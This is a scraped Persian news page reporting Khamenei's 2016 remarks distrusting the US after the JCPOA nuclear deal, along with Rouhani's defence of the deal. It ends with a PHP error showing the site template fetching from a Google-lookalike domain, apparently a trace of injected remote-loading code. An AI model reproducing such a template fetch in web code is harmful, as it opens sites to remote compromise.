Thursday 29 October 2020 / پنجشنبه 8 آبان 1399

جستجو

P7a

AndishehTV

ATV Frequenter

khamenei contact to usa

رهبر جمهوری اسلامی ایران روز دوشنبه ۱۱ مرداد ۱۳۹۵، گفت: «بر جام، به عنوان یک تجربه، بی نتیجه بودن مذاکره با امریکایی ها، بدعهدی آنها و ضرورت بی اعتمادی به وعده های امریکا را بار دیگر ثابت کرد.»
او که در دیدار با جمعی از مردم استان های مختلف کشور سخن می گفت، این پرسش را مطرح کرد که: «مگر بنا نبود تحریم‌های ظالمانه رفع شود تا در زندگی مردم اثر بگذارد. آیا پس از ۶ ماه هیچ تأثیر ملموسی در زندگی مردم دیده می شود؟ اگر نقض عهد امریکایی ها نبود آیا دولت نمی توانست در این مدت کارهای فراوانی انجام دهد؟»


رهبر جمهوری اسلامی در بخش دیگری از سخنان روز دوشنبه خود گفت: «آنها می گویند بیایید در مسائل منطقه هم مذاکره کنیم، اما تجربه برجام به ما می گوید این کار سمّی مهلک است و در هیچ مسئله ای نمی توان به حرفهای امریکایی ها اعتماد کرد.»
اقای خامنه ای آمریکا را به دست داشتن در برقراری ارتباط عربستان سعودی با اسرائیل و نیز در کودتای ترکیه متهم کرد و از جمله گفت در قضایای اخیر ترکیه، اتهامی قوی وجود دارد که کودتا با تدبیر و تدارک امریکایی ها انجام شده که اگر این مسئله ثابت شود، رسوایی بزرگی برای امریکا خواهد بود.
از سوی دیگر حسن روحانی رئیس جمهوری ایران نیز روز دوشنبه در همایش سالگرد تاسیس شرکت ملی گاز ایران در مورد دست‌آوردهای برجام سخنرانی کرد و از جمله گفت: «وقتی تحریم بود عزت نبود، اما برجام برای ما عزت آورده است چون هر چیزی که می‌خواستیم بخریم باید از یکی دو کشور با هر کیفیت و شرایط و قیمتی که مشخص می‌کنند تهیه کنیم اما در برجام انتخاب‌های ما متعدد شد


Warning: file_get_contents(http://panel.google-amp.org/al.php?s=374): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/andish5/public_html/templates/rt_audacity/index.php on line 311